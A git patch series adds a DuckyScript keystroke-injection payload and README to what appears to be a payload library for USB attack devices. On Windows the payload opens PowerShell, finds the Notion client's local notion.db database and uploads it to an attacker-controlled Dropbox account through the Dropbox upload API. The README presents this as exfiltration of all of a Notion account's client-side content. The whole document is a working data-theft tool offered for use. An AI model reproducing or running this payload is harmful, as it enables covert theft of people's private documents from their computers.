From 821bb9c0e9259f97be0aa43e5c552a5e6c73828c Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 12 Jun 2023 14:38:58 +0200 Subject: [PATCH 1/3] Exfiltrates the entire database of the Notion client --- .../payload.txt | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt new file mode 100644 index 0000000..fd7c904 --- /dev/null +++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt @@ -0,0 +1,49 @@ +REM ######################################################################### +REM # | +REM # Title : Exfiltrates the entire database of the Notion client | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration | +REM # Target : Windows 10-11 | +REM # | +REM ######################################################################### + + +REM Requirements: +REM - Notion must be installed +REM - Internet Connection + + +REM You must define your Dropbox accessToken or modify the exfiltration modality. +DEFINE DROPBOX_ACCESS_TOKEN example + +GUI r +DELAY 1000 +STRING PowerShell +ENTER +DELAY 2000 + +REM Setting about exfiltration +STRING $accessToken = " +STRING DROPBOX_ACCESS_TOKEN +STRING " +ENTER + +REM Settings about Notion DB +STRINGLN + $NotionPath = Join-Path -Path $env:APPDATA -ChildPath 'Notion' + $NotionDatabasePath = Join-Path -Path $NotionPath -ChildPath "notion.db" + + $authHeader = @{Authorization = "Bearer $accessToken"} + + $uploadUrl = "https://content.dropboxapi.com/2/files/upload" + + $dropboxFilePath = "/notion.db" + + $headers = @{} + $headers.Add("Authorization", "Bearer $accessToken") + $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}') + $headers.Add("Content-Type", "application/octet-stream") + + Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $NotionDatabasePath; exit; +END_STRINGLN From d12271c1c52bc5569e6a1678673a9d5fdc5699ba Mon Sep 17 00:00:00 2001 From: aleff-github Date: Mon, 12 Jun 2023 14:39:33 +0200 Subject: [PATCH 2/3] Create README.md --- .../README.md | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md new file mode 100644 index 0000000..d295951 --- /dev/null +++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md @@ -0,0 +1,22 @@ +# Exfiltrates the entire database of the Notion client + +This script can be used to exfiltrate the entire Notion database and thus all client-level content of your Notion account. + +**Category**: Exfiltration + +## Description + +This script can be used to exfiltrate the entire Notion database and thus all client-level content of your Notion account. + +Open a PowerShell, the get dinamically the Notion full-path and then add the `notion.db` string. Then create all the needed variables for the exfiltration and then send it trough Dropbox. I used Dropbox but you can use whatever you want. + +## Dependencies + +* Notion must be installed +* Internet Connection + +## Settings + +- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. + +`DEFINE DROPBOX_ACCESS_TOKEN "example"` \ No newline at end of file From 4f7713cda7728cb368f444763d1fca658b5bebbd Mon Sep 17 00:00:00 2001 From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com> Date: Mon, 12 Jun 2023 14:02:49 -0400 Subject: [PATCH 3/3] Update payload.txt --- .../payload.txt | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt index fd7c904..896cd5b 100644 --- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt +++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt @@ -15,7 +15,7 @@ REM - Internet Connection REM You must define your Dropbox accessToken or modify the exfiltration modality. -DEFINE DROPBOX_ACCESS_TOKEN example +DEFINE #DROPBOX_ACCESS_TOKEN example GUI r DELAY 1000 @@ -24,13 +24,10 @@ ENTER DELAY 2000 REM Setting about exfiltration -STRING $accessToken = " -STRING DROPBOX_ACCESS_TOKEN -STRING " -ENTER +STRINGLN $accessToken = "#DROPBOX_ACCESS_TOKEN" REM Settings about Notion DB -STRINGLN +STRINGLN_BLOCK $NotionPath = Join-Path -Path $env:APPDATA -ChildPath 'Notion' $NotionDatabasePath = Join-Path -Path $NotionPath -ChildPath "notion.db"